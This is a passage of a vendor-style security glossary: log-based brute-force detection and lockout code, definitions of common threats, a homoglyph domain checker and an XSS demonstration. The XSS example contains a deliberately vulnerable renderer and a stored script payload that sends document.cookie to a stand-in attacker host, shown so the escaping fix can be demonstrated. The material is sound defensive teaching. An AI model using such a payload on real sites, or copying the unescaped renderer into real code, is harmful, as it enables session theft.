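    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        ev = parse_auth_line(line)
        if ev is None:
            continue
        if ev["ok"]:
            if ev["ip"] in flagged:
                alerts.append(("success_after_bruteforce", ev["ip"], ev["user"]))
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()                   # drop failures older than the window
        if len(q) >= threshold and ev["ip"] not in flagged:
            flagged.add(ev["ip"])
            alerts.append(("bruteforce", ev["ip"], len(q)))
    return alerts


class LockoutPolicy:
    """Account lockout: `max_failures` bad attempts within `window` lock the account for `lock_for`."""

    def __init__(self, max_failures=5, window=timedelta(minutes=10), lock_for=timedelta(minutes=15)):
        self.max_failures, self.window, self.lock_for = max_failures, window, lock_for
        self.failures = defaultdict(deque)
        self.locked_until = {}

    def is_locked(self, user: str, now: datetime) -> bool:
        return now < self.locked_until.get(user, now)

    def record_failure(self, user: str, now: datetime) -> bool:
        """Record a failed attempt; returns True if the account is (now) locked."""
        q = self.failures[user]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_failures:
            self.locked_until[user] = now + self.lock_for
            q.clear()
        return self.is_locked(user, now)


def demo_lockout():
    """Five failures in five seconds lock 'root'; the lock has expired sixteen minutes later."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    policy = LockoutPolicy()
    during = [policy.record_failure("root", t0 + timedelta(seconds=i)) for i in range(5)]
    return (during, policy.is_locked("root", t0 + timedelta(minutes=14)),
            policy.is_locked("root", t0 + timedelta(minutes=16)))
```

Lockout is a trade-off: an attacker who can trigger it on purpose can lock legitimate users out, which is why many deployments prefer progressive delays or per-IP rate limiting to a hard lock, and why the detector above keys on the source address as well as the account.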

 

Business Email Compromise:  

 

A scam in which an attacker poses as someone the victim trusts over email, typically an executive, a supplier, or a colleague, to get them to send money or sensitive information. Business Email Compromises use spoofed or look-alike sender addresses, or a genuinely hijacked mailbox, and frequently contain no malware at all: just a plausible, urgent request to change a supplier’s bank details or approve a wire transfer. The best way to thwart BECs is to verify any payment or account change over a second channel (a phone call to a number you already have), and to use good judgement on what information you share or links you open.

 

CryptoLocker / Ransomware:  

 

Malware that encrypts files, drives, and more on your device with a key known only to the attacker. To retrieve the key, you are often required to pay a ‘ransom’ in crypto currency or risk losing all of your data. Some forms of Ransomware may also threaten to publish sensitive data publicly.  

 

Ransomware has become one of the most prominent and common types of attacks. It can best be thwarted by keeping backups the malware cannot reach (offline or immutable copies, tested by actually restoring from them) and by using software that detects Ransomware behavior, such as many files being rewritten in quick succession.

 

Denial of Service:  

 

An attack on your computer’s resources making it unable to provide certain network or application services. Example – If an attacker can send an excessive amount of traffic to your router or device it can use up all potential bandwidth and keep you from accessing the internet.  

 

One common yet highly dangerous version is through a Distributed Denial of Service. (This simply means many devices are targeting you at once. Think, botnet). A successful Distributed Denial of Service attack can shut down an organization’s online operation for an extended period of time. This can be done to cause harm to government operations, help a business competitor thrive, or even to demand a ransom before the attack will subside. (Ransom Distributed Denial of Service) 

 

DNS Attacks:   

 

First, a very…very quick overview of DNS. When you go to Outlinesoftware.com you are actually visiting the IP address – 35.193.76.27 – That can be difficult to remember so DNS allows you to enter the domain name instead and sends you to the right IP.  

 

There are several ways a DNS server or DNS services may be attacked. Two of the more common methods are in the form of Denial of Services and DNS spoofing. DNS Denial of Services happen when an organization’s internet facing DNS servers are queried rapidly. (These attacks can be quite complex and include a lot of components). 

 

The second common attack, DNS spoofing, is when an attacker is able to coax you into visiting a different IP address than intended. Example, you enter the domain name you wish to enter and are instead sent to the attacker’s malicious website.  

 

Keep in mind, unlike most cases of computer viruses, malware, and trojans – DNS attacks are not simple files to block / prevent. These are complex threats that nearly always involve a hands-on attacker looking to exploit servers and network vulnerabilities. 

 

Exploits:  

 

Code or a technique that takes advantage of a vulnerability in a device or application to make it do something its designers did not intend, most often running the attacker’s code.

 

Fileless Attack: 

 

A malicious program, script, or payload that runs only in short-term memory and never writes an executable to the device’s hard drive, often by abusing tools that are already installed (PowerShell, WMI, macros in Office documents). This attack is able to evade traditional anti-virus scans that search through common files and drives. Fileless attacks are best prevented through behavioral analysis, memory scanning, and exploit blocking.

 

Keyloggers: 

 

Tools or programs that spy on your keystrokes to steal passwords, financial information, and more.  

 

Homoglyph Attacks:  

 

Using a similar looking letter, number, or symbol to spoof a user through phishing emails or fraudulent domains.   

An email sent from 0utlinesoftware.com (That’s a zero, fyi) pretending to be from Outlinesoftware.com  
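A lookalike-domain check of the kind a link scanner or mail filter runs, as an added example that is not code from the original page. It decodes punycode (the xn-- form internationalised domains take in DNS), collapses confusable characters to a ‘skeleton’, and compares against an allowlist. The allowlist contains only the site’s own domain, the confusable table is a small constructed subset of the Unicode confusables data, and the attacker domains are invented for the example.

```python
import unicodedata

TRUSTED = {"outlinesoftware.com"}     # the site's own domain; the allowlist is assumed for the example

# Characters that render like an ASCII letter (a constructed subset of the Unicode confusables list).
CONFUSABLES = {
    "0": "o", "1": "l", "|": "l", "5": "s", "3": "e",            # digits and symbols that pass for letters
    "\u043e": "o", "\u0430": "a", "\u0435": "e", "\u0440": "p",  # Cyrillic о а е р
    "\u0441": "c", "\u0456": "i", "\u0455": "s", "\u04bb": "h",  # Cyrillic с і ѕ һ
    "\u0261": "g",                                               # Latin script g
}


def to_unicode_host(host: str) -> str:
    """Decode punycode (xn--) labels so the host is compared as the user sees it in the address bar."""
    host = host.strip().rstrip(".").lower()
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host            # already contains non-ASCII characters


def skeleton(host: str) -> str:
    """Collapse look-alike characters (and pairs such as 'rn' for 'm') to a canonical form."""
    s = unicodedata.normalize("NFKC", to_unicode_host(host))
    s = "".join(CONFUSABLES.get(ch, ch) for ch in s)
    return s.replace("rn", "m").replace("vv", "w")


def scripts_in(label: str) -> set:
    """Unicode scripts used by the letters of one DNS label, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in label if ch.isalpha()}


def check_domain(host: str, trusted=TRUSTED) -> tuple:
    """Classify a host as trusted, a lookalike of a trusted name, mixed-script, or simply unknown."""
    shown = to_unicode_host(host)
    if shown in trusted:
        return ("trusted", shown)
    sk = skeleton(shown)
    for t in trusted:
        if skeleton(t) == sk:
            return ("lookalike", t)
    if any(len(scripts_in(label)) > 1 for label in shown.split(".")):
        return ("mixed-script", None)
    return ("unknown", None)


# What an attacker registers: the brand with a Cyrillic о in front, and its punycode form
# (the form that actually appears in DNS and in certificate names). Both are invented here.
CYRILLIC_O_DOMAIN = "\u043eutlinesoftware.com"
PUNYCODE_DOMAIN = CYRILLIC_O_DOMAIN.encode("idna").decode("ascii")

if __name__ == "__main__":
    for candidate in ("Outlinesoftware.com", "0utlinesoftware.com", PUNYCODE_DOMAIN, "example.org"):
        print(candidate, "->", check_domain(candidate))
```

Browsers apply similar rules before deciding whether to show a domain as Unicode or as raw punycode, which is why a mixed-script label usually appears as xn--… in the address bar; a skeleton match against your own brand names is the check worth adding to an inbound-mail filter.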

 

Insecure Sites: 

 

A site deemed either fraudulent or untrustworthy (not using proper encryption to protect data).    

 

Lateral Movement:  

 

When an attacker moves from one device or application to another in attempt to access more information.  

 

Malware: 

 

Any software written to harm a device, steal data, or give an attacker control. Viruses, worms, Trojans, ransomware, and spyware are all kinds of malware.

 

Modern Threats:  

 

A catch-all term for threats that are more complex and able to evade older anti-virus scans. Modern Threats can often refer to Ransomware, Advanced Persistent Threats, Polymorphic Malware (The malware continuously alters itself to stay hidden), or targeted spear-phishing attempts.  

 

Packers:  

 

A tool that compresses or encrypts software like malware or executables into a hard-to-recognize package that unpacks itself in memory when run. There are many forms of packers that function differently and may encrypt malware or restructure its code rather than just use compression. In each case the goal is still the same: to keep the malicious program hidden from signature scanners, since every packing of the same malware produces a different file. A great way to stop packers is to utilize real-time protection that watches what the program does after it unpacks itself in memory, no matter what the file looks like on disk.

 

Pharming:  

 

Quite similar to phishing in its goal, pharming differs in how you get to the fake site: rather than tricking you into clicking a link, the attacker tampers with name resolution (DNS spoofing, a poisoned DNS cache, or your device’s hosts file) so that typing the correct address still leads you to a website designed to look trustworthy. Example, you type in your bank’s address and land on a webpage that looks exactly like your bank. You enter your username and password into the fake site’s login and now the attacker has access to your financial information. A certificate warning from your browser is often the only visible sign.

 

Phishing: 

 

Attempts to scam a user through fraudulent websites, emails, text messages, phone calls and more. Phishing attempts can be large scale (think, daily robo-calls) or highly targeted. Personalized phishing attempts are called Spear-Phishing. When this occurs with a high-level executive, say for instance a CEO or politician, you may also hear the term ‘Whaling’.  

 

Spear-Phishing attacks are consistently among the most dangerous cyber threats as attackers are very good at making emails look legitimate. By using social media, business websites, and referencing colleagues, attackers are able to send messages that look both safe and urgent.  

Check the Outline Trending Page to learn more about the dangers of Phishing. 

 

Rootkits:  

 

Malicious software that gains root-level (administrator or kernel) access on a device so that it can hide its own files and processes from the operating system and security tools, and make administrative-level changes at will. Rootkits can be delivered through malware and exploits or even Advanced Persistent Threats where an attacker is looking to gain complete control of a device. There is no sure-fire way to prevent Rootkits, but Behavioral Analysis, Exploit Prevention, Secure Boot, and continuous patching will help, and once one is confirmed the reliable fix is to wipe and reinstall rather than trust a cleaning tool.

 

Spyware: 

 

There are versions of spyware that are less malicious, like Adware, that attempt to track your online activity for the purpose of sending you tailored ads. Then, there are much more dangerous applications like keyloggers and rootkits that track activity for the purpose of stealing sensitive data and login information. Newer forms of spyware may also attempt to access a device’s webcam and microphone to listen in on conversations.  

 

Trojan:  

 

A malicious file or application that is designed to look trustworthy. Example – Ever visit a webpage and see a popup that says “Antivirus Expired, click here”? These can often be fairly easy to spot, but Trojans can also disguise themselves in more sophisticated ways. Phishing emails are a favorite way for attackers to deliver Trojans that look like trusted Word documents or invoices but carry malware. Unlike a worm, a Trojan will not spread on its own and needs a user to open or run it. The best way to prevent this from happening is to stay vigilant (NOT CURIOUS) about what you download and open.

 

Vulnerable / Insecure Wi-Fi: 

 

A vulnerable or insecure Wi-Fi network may not necessarily be malicious. In fact, most vulnerable Wi-Fi networks are simply at local coffee shops. Public Wi-Fi can be a great thing, but the problem is that an open network, or one whose password is written on the wall, lets anyone join it, and anyone who can join a shared-password network can potentially capture other users’ traffic. If the Wi-Fi uses no encryption or an outdated method (WEP, or the original WPA) the data you send can be seen quite easily. Websites that use HTTPS (the lock icon) still protect their contents, but when using public Wi-Fi it’s good practice NOT to access sensitive data, like financial sites, without using a VPN.

 

Another thing to consider is that you may not always be accessing the intended wi-fi. It’s not difficult for someone to sit down in a coffee shop, create their own wi-fi network, and give it the very same name as the public one. This means you may be unintentionally connecting to an attacker’s own personal network. Different versions of Antivirus and Internet Security have features to identify untrusted wi-fi networks.  

 

Worms:  

 

Malware that spreads from computer to computer on its own, continuously copying itself to new victims. Unlike a classic virus, a worm does not need to attach itself to another program, and unlike a Trojan it does not need a user to run it: it typically spreads by exploiting vulnerabilities in network services or by emailing itself to everyone in an address book, which is why a single unpatched machine can infect an entire network in minutes.

 

XSS (Cross-Site Scripting):  

 

A malicious script injected into a trusted website by way of an input the site fails to sanitize (a comment box, a profile field, a search parameter in a URL) so that it is delivered to other users as part of the page. XSS attacks work when an attacker is able to exploit a vulnerability in a website that lets a malicious script be stored (stored XSS) or reflected back from a crafted link (reflected XSS). Later, when a user visits the page, the script runs in their browser with the full trust of the legitimate site, because as far as the browser can tell it came from there. From that position it can read the user’s session cookie, submit actions in their name, or rewrite the page to capture what they type. The fix is on the site’s side: escape user-supplied data wherever it is inserted into HTML, and set a Content Security Policy to limit what scripts may run.
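The vulnerable and fixed renderers side by side, as an added example that is not code from the original page. The stored comments are constructed (attacker.example is a reserved example hostname), the page is assumed to render comments with a simple template, and the third comment shows that escaping keeps legitimate quotes and ampersands intact as text.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed stored comments, including one submitted by an attacker. The attacker's script would
# send every visitor's session cookie to a host under their control (attacker.example is a
# reserved, non-routable example name).
COMMENTS = [
    ("alice", "Great article!"),
    ("mallory", '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'),
    ("bob", 'Use a "strong" password & a second factor'),
]


def render_vulnerable(comments) -> str:
    """Stored XSS: user text is dropped straight into the HTML, so Mallory's script tag is live."""
    return "\n".join(f"<p><b>{user}</b>: {text}</p>" for user, text in comments)


def render_escaped(comments) -> str:
    """The fix: escape <, >, &, and quotes so user text is shown as text and never parsed as markup."""
    return "\n".join(
        f"<p><b>{html.escape(user)}</b>: {html.escape(text)}</p>" for user, text in comments
    )


def safe_href(url: str) -> str:
    """Escaping is not enough inside href: a 'javascript:' URL runs code without any tag. Allow only
    absolute http(s) links and send anything else to '#'."""
    cleaned = url.strip()
    parts = urlsplit(cleaned)
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(cleaned, quote=True)
    return "#"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(fragment: str) -> bool:
    """Crude check used only to compare the two renderers: is there an unescaped <script tag?"""
    return SCRIPT_TAG.search(fragment) is not None


# A Content Security Policy header as a second layer: inline scripts are refused even if one slips
# through, because only scripts loaded from the site's own origin may run.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'; object-src 'none'")

if __name__ == "__main__":
    print("vulnerable:\n" + render_vulnerable(COMMENTS))
    print("\nescaped:\n" + render_escaped(COMMENTS))
```

Escaping is context-dependent: html.escape is correct for text and attribute values, but a user-supplied URL in href, or a value dropped inside a script block, needs its own rules (the scheme allowlist above for links). The Content Security Policy header is the second layer: even if an injection slips through, a browser enforcing script-src 'self' will refuse to run the inline script.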

 

Zero-Day Threats:  

 

Threats that are brand new in the wild and have not been added to any security databases. Zero-Day threats may be an exploit of a recent software vulnerability or a new form of malware. These are best prevented through security tools that do not rely solely on signature analysis (as the signature is entirely new or non-existent) and utilize some form of behavior analysis, heuristic analysis, or machine learning.

 

*Please note, each manufacturer may use slightly different language or examples for the above terms. Where one application may use Behavior Analysis to monitor events in motion, another may use it to evaluate code pre-execution. The goal of the above definitions is to provide a general understanding of common security features and threats. It is always a good idea to check out each companies’ product documentation.*
